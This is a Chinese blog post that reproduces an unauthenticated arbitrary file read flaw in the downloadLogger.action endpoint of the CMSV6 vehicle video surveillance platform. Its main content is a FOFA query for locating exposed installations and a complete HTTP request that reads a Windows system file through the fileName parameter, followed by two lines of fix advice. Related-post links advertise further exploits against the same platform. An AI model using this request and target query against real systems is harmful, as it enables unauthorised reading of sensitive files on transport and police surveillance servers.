通天星CMSV6车载视频监控平台 downloadLogger.action 任意文件读取漏洞复现

已于 2024-04-11 14:16:28 修改
阅读量296 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-04-11 14:16:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137637594
版权

0x01 产品简介

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。

0x02 漏洞概述

通天星CMSV6车载视频监控平台 downloadLogger.action接口处任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。

0x03 复现环境

FOFA:body="/808gps/"

0x04 漏洞复现

PoC

GET /808gps/logger/downloadLogger.action?fileName=C://Windows//win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20172209 Firefox/103.0
Connection: close
Accept: */*
Accept-Encoding: gzip

读取C://Windows//win.ini

0x05 修复建议 

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0xSecl
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
74cms v4.2.X任意文件读取漏洞
09-06
影响版本: 74cms v4.2. 74cms v4.2 74cms v4.2.3 74cms v5.0.1 有任意删除文件漏洞和SQL漏洞,有poc的复现过程。
天星CMSV6车载视频监控平台 getImage 任意文件读取漏洞复现
0xSec
02-26 999
天星CMSV6车载视频监控平台StandardReportMediaAction_getImage.action接口任意文件读取漏洞,未经身份认证的攻击者可以过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
漏洞复现天星CMSV6车载监控平台getImage任意文件读取漏洞
晚风不及你
03-04 632
深圳市天星科技有限公司,是一家以从事计算机、信和其他电子设备制造业为主的企业。天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交上。
天星CMSV6车载定位监控平台 SQL注入漏洞复现(含nuclei-poc)
m0_50797689的博客
03-18 308
天星CMSV6车载定位监控平台 SQL注入漏洞复现(含nuclei-poc)
漏洞复现天星CMSV6车载监控平台downloadLogger文件读取漏洞
晚风不及你
04-25 15
天星CMSV6车载视频监控平台存在downloadLogger文件读取漏洞,攻击者可以利用此漏洞读取服务器文件信息,造成敏感信息泄露等安全问题。
天星CMSV6车载定位监控平台 MobileAction 文件读取漏洞复现
0xSec
12-16 1163
天星CMSV6车载视频监控平台MobileAction_downLoad.action 接口任意文件读取漏洞,未经身份认证的攻击者可以过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
天星CMSV6 车载视频监控平台 信息泄露漏洞复现
0xSec
02-23 721
天星CMSV6车载视频监控平台StandardLoginAction_getAllUser.action接口处存在信息泄露漏洞,未经身份认证的攻击者可以过此漏洞获取系统内部账户密码等敏感信息,登录后台页面,使系统处于极不安全状态。
鸿运(天星CMSV6车载)主动安全监控云平台任意文件读取
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-27 520
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运主动安全监控云平台StandardReportMediaAction_getImage存在任意文件读取漏洞,攻击者可利用该漏洞读取系统敏感文件。鸿运(天星CMSV6车载)主动安全监控云平台
漏洞复现天星CMSV6车载监控平台getImage文件读取漏洞
晚风不及你
04-25 38
天星CMSV6车载视频监控平台存在getImage文件读取漏洞,攻击者可以利用此漏洞读取服务器文件信息,造成敏感信息泄露等安全问题。
漏洞复现天星CMSV6车载监控平台MobileAction文件读取漏洞
晚风不及你
04-25 21
天星CMSV6车载视频监控平台存在MobileAction文件读取漏洞,攻击者可以利用此漏洞获取服务器文件信息,造成敏感信息泄露等安全问题。
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多...
苹果CMSv10粉色大气视频站模板.zip
05-27
价值100元的商业苹果CMSv10粉色大气视频站模板,丰富自定义页面如全站单榜、周期更新、帮助页面,支持影视专题、影片评论、留言本、迅雷下载插件、用户中心。这套粉色大气视频站模板的效果基础上新增矢量图图标,更...
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
漏洞简介:易优cms企业建站系统是由php+mysql开发的一套专门用于中小企业网站建设的开源cms。可以用来快速建设一个企业网站( PC,手机,微信都可以访问
【联官网及APP注册/登录安全分析报告】
weixin_46641057的博客
05-09 546
作为信行业的老大哥, 采用的老一代的图形验证码已经落伍了, 用户体验差,还容易被破解App 端虽然采用了360加固, 但懂技术的都知道, 客户端无论如何都有可能被逆向,靠加固是否无法保证安全的,脱壳后的算法就如同皇帝的新装,暴露在黑客面前。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。
RSAC 2024观察:软件供应链安全进入AI+时代
最新发布
lurenjia404的博客
05-15 707
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
以AI对抗AI,瑞数“动态安全+AI”助力在线反欺诈
科技云报道
05-09 413
动态混淆将敏感数据混淆变化,防止中间人攻击;可以看到,瑞数信息将“动态安全+AI”作为重要技术基石,提供面向应用和业务层面的主动防御能力,高效甄别伪装和假冒正常行为的已知和未知自动化攻击,有效打击伪装成正常交易的业务作弊、利用合法账号窃取敏感数据及假冒终端应用的各类网络欺诈,对在线交易、数据与企业网站的安全保驾护航。瑞数信息过动态安全和AI引擎,将风险防控进一步前置,帮助企业深入了解欺诈事件的事前、事中、事后的不同阶段表现,并为企业事前的欺诈风险主动进行及时感知,对事中的实时识别与决策效果提供参考。
cmsv6 sql注入漏洞
04-26
CMSv6是一个广泛使用的内容管理系统,而SQL注入漏洞是一种常见的Web应用程序漏洞。当Web应用程序没有正确过滤用户输入或使用不安全的查询方法时,攻击者可以利用SQL注入漏洞向数据库发送恶意的SQL代码,从而获取、修改或删除数据库中的数据。 CMSv6的SQL注入漏洞可能导致以下风险: 1. 数据泄露:攻击者可以过注入恶意的SQL代码来获取数据库中的敏感信息,如用户账号、密码等。 2. 数据篡改:攻击者可以修改数据库中的数据,包括修改用户信息、文章内容等。 3. 数据删除:攻击者可以过注入删除语句删除数据库中的数据,导致数据的不可恢复性损失。 为了防止SQL注入漏洞,开发者应该采取以下措施: 1. 使用参数化查询或预编译语句来处理用户输入,确保输入数据经过正确的转义和过滤。 2. 对于动态生成的SQL查询,避免直接拼接用户输入到查询语句中,而是使用参数化查询。 3. 限制数据库用户的权限,确保数据库用户只能执行必要的操作,并且不允许直接执行危险的SQL语句。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值